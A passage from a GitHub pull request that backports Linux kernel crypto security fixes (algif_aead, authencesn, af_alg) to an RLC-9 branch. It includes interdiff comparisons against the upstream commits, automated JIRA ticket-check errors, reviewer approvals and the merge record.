+++ b/crypto/authencesn.c
@@ -225,10 +204,9 @@
-			      crypto_ahash_alignmask(auth) + 1);
+	u8 *ohash = areq_ctx->tail;
 	unsigned int cryptlen = req->cryptlen - authsize;
 	unsigned int assoclen = req->assoclen;
 	struct scatterlist *dst = req->dst;
 	u8 *ihash = ohash + crypto_ahash_digestsize(auth);
 	u32 tmp[2];
-
 	if (!authsize)
 		goto decrypt;
 
@@ -281,11 +254,8 @@
 
 	cryptlen -= authsize;
 
-	if (req->src != dst) {
-		err = crypto_authenc_esn_copy(req, assoclen + cryptlen);
-		if (err)
-			return err;
-	}
+	if (req->src != dst)
+		memcpy_sglist(dst, req->src, assoclen + cryptlen);
 
 	scatterwalk_map_and_copy(ihash, req->src, assoclen + cryptlen,
 				 authsize, 0);
  • ⚠️ PR commit 46a53ab9bab (crypto: algif_aead - snapshot IV for async AEAD requests) → upstream 5aa58c3a572b
    Differences found:
================================================================================
*    DELTA DIFFERENCES - code changes that differ between the patches          *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -220,7 +220,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, iv);
+			       areq->first_rsgl.sgl.sg, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

################################################################################
!    REJECTED PATCH2 HUNKS - could not be compared; manual review needed       !
################################################################################

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -193,7 +199,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);
 

================================================================================
*    CONTEXT DIFFERENCES - surrounding code differences between the patches    *
================================================================================

--- b/crypto/algif_aead.c
+++ b/crypto/algif_aead.c
@@ -69,5 +69,5 @@
-	struct crypto_aead *tfm = aeadc->aead;
-	struct crypto_sync_skcipher *null_tfm = aeadc->null_tfm;
+	struct af_alg_ctx *ctx = ask->private;
+	struct crypto_aead *tfm = pask->private;
 	unsigned int as = crypto_aead_authsize(tfm);
 	struct af_alg_async_req *areq;
 	struct scatterlist *rsgl_src, *tsgl_src = NULL;
@@ -208,7 +184,7 @@
 
 	/* Initialize the crypto operation */
 	aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
-			       areq->first_rsgl.sgl.sg, used, ctx->iv);
+			       areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);
 	aead_request_set_ad(&areq->cra_u.aead_req, ctx->aead_assoclen);
 	aead_request_set_tfm(&areq->cra_u.aead_req, tfm);

This is an automated interdiff check for backported commits.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

JIRA PR Check Results

10 commit(s) with issues found:

Commit 46a53ab9babc

Summary: crypto: algif_aead - snapshot IV for async AEAD requests

❌ Errors:

  • VULN-181881: Status is 'Done', expected 'In Progress'
  • VULN-181881: LTS product 'lts-9.6' expects branch 'ciqlts9_6', but merge target is 'rlc-9/5.14.0-611.49.1.el9_7'

Commit 77d0096b173b

Summary: crypto: algif_aead - Fix minimum RX size check for decryption

❌ Errors:

  • VULN-181881: Status is 'Done', expected 'In Progress'
  • VULN-181881: LTS product 'lts-9.6' expects branch 'ciqlts9_6', but merge target is 'rlc-9/5.14.0-611.49.1.el9_7'

Commit e3128132a44a

Summary: crypto: authencesn - reject short ahash digests during instance creation

❌ Errors:

  • VULN-181881: Status is 'Done', expected 'In Progress'
  • VULN-181881: LTS product 'lts-9.6' expects branch 'ciqlts9_6', but merge target is 'rlc-9/5.14.0-611.49.1.el9_7'

Commit b174cd46ad6c

Summary: crypto: authencesn - Fix src offset when decrypting in-place

❌ Errors:

  • VULN-181881: Status is 'Done', expected 'In Progress'
  • VULN-181881: LTS product 'lts-9.6' expects branch 'ciqlts9_6', but merge target is 'rlc-9/5.14.0-611.49.1.el9_7'

Commit 9a6b92431e0b

Summary: crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption

❌ Errors:

  • VULN-181881: Status is 'Done', expected 'In Progress'
  • VULN-181881: LTS product 'lts-9.6' expects branch 'ciqlts9_6', but merge target is 'rlc-9/5.14.0-611.49.1.el9_7'

Commit 25bacbc4ba5d

Summary: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec

❌ Errors:

  • VULN-175569: Status is 'Done', expected 'In Progress'
  • VULN-175569: LTS product 'lts-9.6' expects branch 'ciqlts9_6', but merge target is 'rlc-9/5.14.0-611.49.1.el9_7'

Commit 521c5959ba8f

Summary: crypto: af_alg - Fix page reassignment overflow in af_alg_pull_tsgl

❌ Errors:

  • VULN-182991: Status is 'Done', expected 'In Progress'
  • VULN-182991: LTS product 'lts-9.6' expects branch 'ciqlts9_6', but merge target is 'rlc-9/5.14.0-611.49.1.el9_7'

Commit 56d1d042ef1d

Summary: crypto: af_alg - limit RX SG extraction by receive buffer budget

❌ Errors:

  • VULN-182991: Status is 'Done', expected 'In Progress'
  • VULN-182991: LTS product 'lts-9.6' expects branch 'ciqlts9_6', but merge target is 'rlc-9/5.14.0-611.49.1.el9_7'

Commit 29fa92bcccc5

Summary: crypto: algif_aead - Revert to operating out-of-place

❌ Errors:

  • VULN-181881: Status is 'Done', expected 'In Progress'
  • VULN-181881: LTS product 'lts-9.6' expects branch 'ciqlts9_6', but merge target is 'rlc-9/5.14.0-611.49.1.el9_7'

Commit e3eeec79a731

Summary: crypto: af-alg - fix NULL pointer dereference in scatterwalk

❌ Errors:

  • VULN-181881: Status is 'Done', expected 'In Progress'
  • VULN-181881: LTS product 'lts-9.6' expects branch 'ciqlts9_6', but merge target is 'rlc-9/5.14.0-611.49.1.el9_7'

Summary: Checked 10 commit(s) total.

@github-actions

github-actions Bot commented May 1, 2026

Copy link
Copy Markdown

Validation checks completed with issues View full results: https://github.com/ctrliq/kernel-src-tree/actions/runs/25214524511

@github-actions github-actions Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ This PR contains VULN tickets that do not match the target LTS product. Please review the JIRA ticket assignments and ensure they match the merge target branch.

@PlaidCat PlaidCat dismissed github-actions[bot]’s stale review May 1, 2026 15:02

Errors are from cherry-picking commits with VULNS that are associated to LTSs

We do not have VULN tickets for RLC-X products as they're traditionally rolling releases from RESF/RHEL

@PlaidCat PlaidCat requested review from a team May 1, 2026 15:02

@PlaidCat PlaidCat left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

:shipit:

@kerneltoast kerneltoast left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Interdiff shows this is exactly the same as the commits merged to ciqlts9_6, even at --fuzzy=0.

🚢

@bmastbergen bmastbergen self-requested a review May 1, 2026 20:24

@bmastbergen bmastbergen left a comment

Copy link
Copy Markdown
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🥌

@PlaidCat PlaidCat merged commit 139092b into rlc-9/5.14.0-611.49.1.el9_7 May 1, 2026
6 checks passed
@PlaidCat PlaidCat deleted the {rnicolescu}_rlc-9/5.14.0-611.49.1.el9_7 branch May 1, 2026 20:30
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

created-by-kernelci Tag PRs that were automatically created when a user branch was pushed to the repo (kernelCI)

Development

Successfully merging this pull request may close these issues.

3 participants